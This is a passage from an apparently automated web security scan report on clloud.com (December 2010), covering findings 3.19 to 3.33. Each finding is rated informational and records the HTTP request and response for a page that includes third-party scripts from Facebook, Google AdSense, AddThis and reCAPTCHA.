Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.19. http://clloud.com/reviews/cloudlayer-storage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /reviews/cloudlayer-storage/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/cloudlayer-storage/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.20. http://clloud.com/reviews/rackspace-cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /reviews/rackspace-cloud/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/rackspace-cloud/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.21. http://clloud.com/tag/amazon-s3-review/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/amazon-s3-review/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/amazon-s3-review/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:03 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...

3.22. http://clloud.com/tag/amazon-s3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/amazon-s3/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/amazon-s3/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:48:21 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...

3.23. http://clloud.com/tag/amazon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/amazon/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/amazon/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:48:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...

3.24. http://clloud.com/tag/cdn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cdn/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/cdn/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...

3.25. http://clloud.com/tag/cloud-server/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cloud-server/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/cloud-server/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.26. http://clloud.com/tag/cloud-servers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cloud-servers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/cloud-servers/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.27. http://clloud.com/tag/cloud-storage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cloud-storage/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/cloud-storage/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...

3.28. http://clloud.com/tag/cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cloud/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/cloud/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:06 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.29. http://clloud.com/tag/cloudlayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cloudlayer/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/cloudlayer/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.30. http://clloud.com/tag/cname/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cname/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/cname/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:50:03 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.31. http://clloud.com/tag/control-panel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/control-panel/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/control-panel/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:50:36 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.32. http://clloud.com/tag/gigenet-review/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/gigenet-review/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/gigenet-review/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...

3.33. http://clloud.com/tag/gigenet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/gigenet/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tag/gigenet/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:50:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
